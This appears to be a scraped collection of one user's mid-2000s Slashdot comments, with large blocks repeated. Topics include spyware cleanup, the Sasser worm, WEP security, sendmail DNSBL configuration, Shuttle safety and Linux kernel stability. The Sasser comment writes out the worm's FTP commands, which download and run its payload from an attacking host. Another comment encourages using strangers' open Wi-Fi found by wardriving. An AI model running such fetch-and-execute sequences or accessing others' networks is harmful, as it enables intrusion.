I disagree. Many, many internet hoxes were born before 1997. 'David Rhodes' & MAKE.MONEY.FAST dates to the 80's, many others date from the early 90s.
Here's the
David Rhodes hoax from Usenet in 1989
Last night I spent 3 hours at a neighbor's house on spyware patrol. He's a fireman who plows my driveway for free (he is Joe Sixpack personified), and I'm his volunteer tech monkey. I cleaned them all out 2 months ago, and now they were in worse shape.
All 3 of computers were unable to surf the web. Teenage daughters had downloaded Kazaa, weatherbug, morpheus and others. I explained the dangers of spyware (and getting sued by the RIAA, hoping the scare them into ending the spyware party) to them last time, with predictable results. I also advised Dad to lay down the law (I'm not holding my breath).
The 98SE box (yeah, I know) was completely hosed. Booted up, auto-launched about 8 different programs, auto popups, and would actually blue screen before I could launch a single app. I blew that one away, reinstalled from scratch, and ran Windows update (requiring 5 reboots) for close to 2 hours (ever run windows update after a clean install of 4-year old media? Not fun).
And he has a hardware firewall and fast cable modem connection: this would have been impossible on dialup (and the clean install would have been compromised within 10 minutes without the firewall).
After all of this, I had all 3 computers working fine, with up-to-date patches, virus protection, and an Ad Aware icon on the desktop. Also a lecture on the evils of spyware to the assembled daughters.
I'll be back there in a month or 2, guaranteed. Let's hope for lots of snow next winter.
It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
Um, because the number of internet-exploitable IIS 5 systems outnumbers the number of internet-exploitable MySQL and Samba systems by a factor of at least 100 to 1?
Similar Apache bugs have received 'front page' billing, which is appropriate.
The recession is open source's best friend
on
CIOs Looking At OSS
·
· Score: 4, Insightful
With ever-tightening budgets, open source is getting a firmhold in many companies that would have bought closed source retail software during the fat budget years.
I've had a number of open source-based projects greenlighted (intrusion detection, vulnerability scanners, virus/spam blocking SMTP gateways, etc.) that would not have been approved if we had to pay large operating system or software licensing fees.
Yes, 2 in 113 of the whole crew dying. 1 in 8 of any given astronaut. My math is fine. I'm not trolling here: the truth hurts.
Of course space is dangerous, and there should be a good reason for putting human beings in such danger. There isn't any compelling reason for the Shuttle to fly.
Read the article: it's outdated design. The shuttle can't carry heavy cargoes, and can't reach most satellite orbits. It's basically a powerless glider once it hits orbit. And it's hugely expesnvie compared with unmanned craft (which can carry far heavier cargoes, reach all orbits, and fail without killing 7 astronauts).
Did you know NASA predicted *WEEKLY* shuttle flights, to justify the massive expense of the program (compared with unmanned rockets)?
The shuttle was an expensive boondoggle in 1980. 14 dead astronauts later, and it's now a catastrophic diasaster.
113 flights and 14 dead astronauts = 1 in 8 chance of an astronaut dying on any given flight. All this for junk science like ant colonies in space (call Homer Simpson!), and soybean germination in zero gravity.
The shuttle design is 30 years old. We have to be capable of better design now. NASA should return to unmanned missions, and go back to the drawing board for future manned flights.
Could you detail a real-world attack that would break the security of the network I described above? Also, how long this real-world attack would take to complete?
In my tests, Airsnort, etc., were painfully slow on normal WEP networks, nevermind WEP+ (point taken that it's not standard) with dual keys.
I'm not arguing with your points: 'reasonable security' is highly subjective (a home user and a bank would have different answers). I'd like to know what specific steps someone would need to take to break into a network as I described today.
Weak keys were addressed by 'WEP+', an 802.11b firmware upgrade which negates the weak inititialization vector attack. WEP+ is now available from most vendors.
Many 802.11b APs also allow separate xmit and recv keys, making WEP attacks much more difficult.
Then disable SSID broadcasts (making your 802.11b wireless network invisible to tools like netstumbler).
WEP certainly has its weaknesses (especially when 802.11b was first released), but is arguably 'reasonably secure' today. It's far from perfect, but is not nearly as bad as people make it out to be.
Wrong. I use DNSBLs to block 10,000+ spams/week aimed at my users. I was using static relay REJECTs via the sendmail access file, but could not keep up with the torrent and increasing user complaints.
Aside from the obvious potential waste of time and bandwidth those 10,000 spams represent, much of it is obscene and sent by criminals.
I also track rejected mail and whitelist relays when necessary. This system works very well.
I chose not to use SPEWS due to collateral damage concerns. It's my call. If you are a postmaster, it's your call as well. One size does not fit all. DNSBLs are an invaluable tool.
The time and money you invest in the sort term will be repaid many times over in the long term. Spammers will send less successful spam, which is a win for all of us. You & your users will be much happier, too.
I also manage email for 10,000+ users. And I do a lot more than that; it simply does not take that much time if you handle things properly.
For corporate-wide spam blocking, sendmail has some great spam filtering features via DNS Black Lists (dnsbl). I use spamhaus.org and relays.osirusoft.com.
Add these lines to your sendmail.mc:
FEATURE(dnsbl, `sbl.spamhaus.org', `"550 Mail from " $&{client_addr} " rejected, see http://www.spamhaus.org/"')dnl
FEATURE(dnsbl, `relays.osirusoft.com', `"550 Mail from " $&{client_addr} " rejected, see http://relays.osirusoft.com"')dnl
There goes 90+% of the problem. After that, spamassassin handles the 10% that trickles through quite nicely.
If you don't use sendmail, all other modern mail relays can handle this problem in similar ways.
Health Insurance Portability and Accountability Act.
Most health care organizations are far from clueless, believe me. Your average healthcare IT manager is well aware of HIPAA, as they've been working on the transaction and privacy aspects for quite awhile.
The techs in the trenches may know less, mostly because the data security regulations (the 3rd, and largest portion of the HIPAA work) are not yet finalized. The real work doesn't begin until then: probably sometime later this year.
I've run linux since Slackware & the beta kernel days. That era ended (professionally) when I had to support production internet servers (Squid http proxy, sendmail gateways, and apache web servers) running the Linux 2.4 kernel (AKA the 'kernel of pain').
Lots of unstability, phantom escalating tcp timeouts, and high-traffic production boxes would crash or become unstable after 1-3 weeks of use, requiring a reboot. I upgraded the 2.4 kernel multiple times, but never resolved all problems.
I'm still a fan, but Linux really stumbled with the 2.4 kernel. There's always a balance between features and stability, and 2.4 got that balance wrong. Very wrong.
I switched all production servers to FreeBSD. One of the best decisions of my career. 10 months later: 100% uptime. Literally. Same hardware, same applications, same network, more users, heavier usage. Rock !@#$-ing solid.
Re:Why content filtering is not enough
on
As the Spam Turns
·
· Score: 2
> However, they have no effect on the cost of the > bandwidth and other resource costs of spam
Not true. Many spammers include unique URLs within spam that are tracked when a user clicks (or even previews via Outlook) on a spam. This proves a spam was actually viewed, and these views are tracked closely. An email address that is proven to view spam is worth much more to spammers than one that isn't, and these addresses are bought and sold at a premuim.
Any account that views spam will eventually receive a lot more spam than one that doesn't.
If you stop the views, you slow the spam.
So this helps the bandwidth problem, especially in the long run.
I work in a ground-floor data center in an old building. My indoor 802.11b access point is across the hall and must cross through 2 foot-thick cinderblock concrete walls to reach me.
I have good bandwidth, with a generic omnidrectional anttena on the AP. I can also access the network from the street 50+ meters way.
A plain-vanilla 802.11b wireless network with directional antennas will work fine here. 802.11b's wavelenth lends itself to these sort of applications (802.11a, while faster for line-of-site, degrades badly in these types of situations).
This is true even if the antennas are indoors, pointing through brick walls.
Add directional antennas pointing through windows, and the situation will improve dramatically. Add small hidden outdoor antennas, and the picture is even better.
A wireless tech told me that he hooked up a 50-mile 802.11b network in Africa between 2 mountaintops (one with local internet access, with other without). The wireless link was 2 'only' mbits (down from a theoretical 11 mbits), but otherwise worked fine.
A friend does PC support (including telecommuter support) for a large retail company. A woman called in, to say that her home PC was acting stangely, and not typing the keys she pressed.
My friend went to her house with a new keyboard. When he looked at the old one, he saw that the keys were arranged alphabetically. with 'a' where the q is supposed to be, 'b' where the w is, etc.
She explained that she was having trouble finding the keys, so she rearranged them so she could find them easier.
...because you can get it for free, with exponetially more coverage than this scheme offers.
Crank up Netstumbler (http://www.netstumbler.com) on your laptop, and drive around. You'll be amazed at how many open networks you find; at least 2/3rds don't even use WEP encryption. The Linksys wireless AP is now less than $200: they're everywhere (and most are running on the default config, and offer a DHCP IP address with no questions asked).
Slashdot Mirror
You're forgetting that a UK imperial gallon == 1.20 US gallons. So please adjust your British "MPG" accordingly for an apples-to-apples comparison.
My car gets forty rods to the hogshead, and that's the way I likes it!
I disagree. Many, many internet hoxes were born before 1997. 'David Rhodes' & MAKE.MONEY.FAST dates to the 80's, many others date from the early 90s. Here's the David Rhodes hoax from Usenet in 1989
Last night I spent 3 hours at a neighbor's house on spyware patrol. He's a fireman who plows my driveway for free (he is Joe Sixpack personified), and I'm his volunteer tech monkey. I cleaned them all out 2 months ago, and now they were in worse shape.
All 3 of computers were unable to surf the web. Teenage daughters had downloaded Kazaa, weatherbug, morpheus and others. I explained the dangers of spyware (and getting sued by the RIAA, hoping the scare them into ending the spyware party) to them last time, with predictable results. I also advised Dad to lay down the law (I'm not holding my breath).
The 98SE box (yeah, I know) was completely hosed. Booted up, auto-launched about 8 different programs, auto popups, and would actually blue screen before I could launch a single app. I blew that one away, reinstalled from scratch, and ran Windows update (requiring 5 reboots) for close to 2 hours (ever run windows update after a clean install of 4-year old media? Not fun).
And he has a hardware firewall and fast cable modem connection: this would have been impossible on dialup (and the clean install would have been compromised within 10 minutes without the firewall).
After all of this, I had all 3 computers working fine, with up-to-date patches, virus protection, and an Ad Aware icon on the desktop. Also a lecture on the evils of spyware to the assembled daughters.
I'll be back there in a month or 2, guaranteed. Let's hope for lots of snow next winter.
Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
My impression thus far: very sweet.
I tried registering some short usernames, the username has to be 6 characters or longer.
So I have a leet 6-character name@gmail.com.
Transit time for sent and recived mail is near-instantaneous.
The interface is trademark google utilitarian. Two thumbs up.
I sent some test spam from my spam folder, they got into my inbox (and not to my 'spam'
folder on gmail). So they have some tweaking to do there.
Um, because the number of internet-exploitable IIS 5 systems outnumbers the number of internet-exploitable MySQL and Samba systems by a factor of at least 100 to 1?
Similar Apache bugs have received 'front page' billing, which is appropriate.
With ever-tightening budgets, open source is getting a firmhold in many companies that would have bought closed source retail software during the fat budget years.
I've had a number of open source-based projects greenlighted (intrusion detection, vulnerability scanners, virus/spam blocking SMTP gateways, etc.) that would not have been approved if we had to pay large operating system or software licensing fees.
Agreed; my math is off. I retract my '1 in 8 claim.' I apologize (and wasn't intentionally trolling).
The rest of my points stand.
Yes, 2 in 113 of the whole crew dying. 1 in 8 of any given astronaut. My math is fine. I'm not trolling here: the truth hurts.
Of course space is dangerous, and there should be a good reason for putting human beings in such danger. There isn't any compelling reason for the Shuttle to fly.
Read the article: it's outdated design. The shuttle can't carry heavy cargoes, and can't reach most satellite orbits. It's basically a powerless glider once it hits orbit. And it's hugely expesnvie compared with unmanned craft (which can carry far heavier cargoes, reach all orbits, and fail without killing 7 astronauts).
Did you know NASA predicted *WEEKLY* shuttle flights, to justify the massive expense of the program (compared with unmanned rockets)?
It's time for something new.
Disagree? Read this spooky article written in 1980. Predicted death, both by explosion on liftoff, and due to failed tiles on landing.
0 4.easterbrook-fulltext.html
http://www.washingtonmonthly.com/features/2001/80
The shuttle was an expensive boondoggle in 1980. 14 dead astronauts later, and it's now a catastrophic diasaster.
113 flights and 14 dead astronauts = 1 in 8 chance of an astronaut dying on any given flight. All this for junk science like ant colonies in space (call Homer Simpson!), and soybean germination in zero gravity.
The shuttle design is 30 years old. We have to be capable of better design now. NASA should return to unmanned missions, and go back to the drawing board for future manned flights.
Could you detail a real-world attack that would break the security of the network I described above? Also, how long this real-world attack would take to complete?
In my tests, Airsnort, etc., were painfully slow on normal WEP networks, nevermind WEP+ (point taken that it's not standard) with dual keys.
I'm not arguing with your points: 'reasonable security' is highly subjective (a home user and a bank would have different answers). I'd like to know what specific steps someone would need to take to break into a network as I described today.
802.11g has the same security as 802.11b.
Weak keys were addressed by 'WEP+', an 802.11b firmware upgrade which negates the weak inititialization vector attack. WEP+ is now available from most vendors.
Many 802.11b APs also allow separate xmit and recv keys, making WEP attacks much more difficult.
Then disable SSID broadcasts (making your 802.11b wireless network invisible to tools like netstumbler).
WEP certainly has its weaknesses (especially when 802.11b was first released), but is arguably 'reasonably secure' today. It's far from perfect, but is not nearly as bad as people make it out to be.
'SPEWS is bad, so DNSBLs are bad!'
Wrong. I use DNSBLs to block 10,000+ spams/week aimed at my users. I was using static relay REJECTs via the sendmail access file, but could not keep up with the torrent and increasing user complaints.
Aside from the obvious potential waste of time and bandwidth those 10,000 spams represent, much of it is obscene and sent by criminals.
I also track rejected mail and whitelist relays when necessary. This system works very well.
I chose not to use SPEWS due to collateral damage concerns. It's my call. If you are a postmaster, it's your call as well. One size does not fit all. DNSBLs are an invaluable tool.
Before you hit 'reply' to this topic, remember: do not taunt the Happy Fun Ball:
http://www.happyfunball.com/hfb.html
Then it's time to deploy the right solution.
The time and money you invest in the sort term will be repaid many times over in the long term. Spammers will send less successful spam, which is a win for all of us. You & your users will be much happier, too.
I also manage email for 10,000+ users. And I do a lot more than that; it simply does not take that much time if you handle things properly.
For corporate-wide spam blocking, sendmail has some great spam filtering features via DNS Black Lists (dnsbl). I use spamhaus.org and relays.osirusoft.com.
Add these lines to your sendmail.mc:
FEATURE(dnsbl, `sbl.spamhaus.org', `"550 Mail from " $&{client_addr} " rejected, see http://www.spamhaus.org/"')dnl
FEATURE(dnsbl, `relays.osirusoft.com', `"550 Mail from " $&{client_addr} " rejected, see http://relays.osirusoft.com"')dnl
There goes 90+% of the problem. After that, spamassassin handles the 10% that trickles through quite nicely.
If you don't use sendmail, all other modern mail relays can handle this problem in similar ways.
Health Insurance Portability and Accountability Act.
Most health care organizations are far from clueless, believe me. Your average healthcare IT manager is well aware of HIPAA, as they've been working on the transaction and privacy aspects for quite awhile.
The techs in the trenches may know less, mostly because the data security regulations (the 3rd, and largest portion of the HIPAA work) are not yet finalized. The real work doesn't begin until then: probably sometime later this year.
I've run linux since Slackware & the beta kernel days. That era ended (professionally) when I had to support production internet servers (Squid http proxy, sendmail gateways, and apache web servers) running the Linux 2.4 kernel (AKA the 'kernel of pain').
Lots of unstability, phantom escalating tcp timeouts, and high-traffic production boxes would crash or become unstable after 1-3 weeks of use, requiring a reboot. I upgraded the 2.4 kernel multiple times, but never resolved all problems.
I'm still a fan, but Linux really stumbled with the 2.4 kernel. There's always a balance between features and stability, and 2.4 got that balance wrong. Very wrong.
I switched all production servers to FreeBSD. One of the best decisions of my career. 10 months later: 100% uptime. Literally. Same hardware, same applications, same network, more users, heavier usage. Rock !@#$-ing solid.
> However, they have no effect on the cost of the
> bandwidth and other resource costs of spam
Not true. Many spammers include unique URLs within spam that are tracked when a user clicks (or even previews via Outlook) on a spam. This proves a spam was actually viewed, and these views are tracked closely. An email address that is proven to view spam is worth much more to spammers than one that isn't, and these addresses are bought and sold at a premuim.
Any account that views spam will eventually receive a lot more spam than one that doesn't.
If you stop the views, you slow the spam.
So this helps the bandwidth problem, especially in the long run.
I work in a ground-floor data center in an old building. My indoor 802.11b access point is across the hall and must cross through 2 foot-thick cinderblock concrete walls to reach me.
I have good bandwidth, with a generic omnidrectional anttena on the AP. I can also access the network from the street 50+ meters way.
A plain-vanilla 802.11b wireless network with directional antennas will work fine here. 802.11b's wavelenth lends itself to these sort of applications (802.11a, while faster for line-of-site, degrades badly in these types of situations).
This is true even if the antennas are indoors, pointing through brick walls.
Add directional antennas pointing through windows, and the situation will improve dramatically. Add small hidden outdoor antennas, and the picture is even better.
A wireless tech told me that he hooked up a 50-mile 802.11b network in Africa between 2 mountaintops (one with local internet access, with other without). The wireless link was 2 'only' mbits (down from a theoretical 11 mbits), but otherwise worked fine.
This one's easy.
A friend does PC support (including telecommuter support) for a large retail company. A woman called in, to say that her home PC was acting stangely, and not typing the keys she pressed.
My friend went to her house with a new keyboard. When he looked at the old one, he saw that the keys were arranged alphabetically. with 'a' where the q is supposed to be, 'b' where the w is, etc.
She explained that she was having trouble finding the keys, so she rearranged them so she could find them easier.
...and they can't afford a firewall.
On behalf of Unix Engineers everywhere: Thank you Unisys. Thank you, Microsoft.
...because you can get it for free, with exponetially more coverage than this scheme offers.
Crank up Netstumbler (http://www.netstumbler.com) on your laptop, and drive around. You'll be amazed at how many open networks you find; at least 2/3rds don't even use WEP encryption. The Linksys wireless AP is now less than $200: they're everywhere (and most are running on the default config, and offer a DHCP IP address with no questions asked).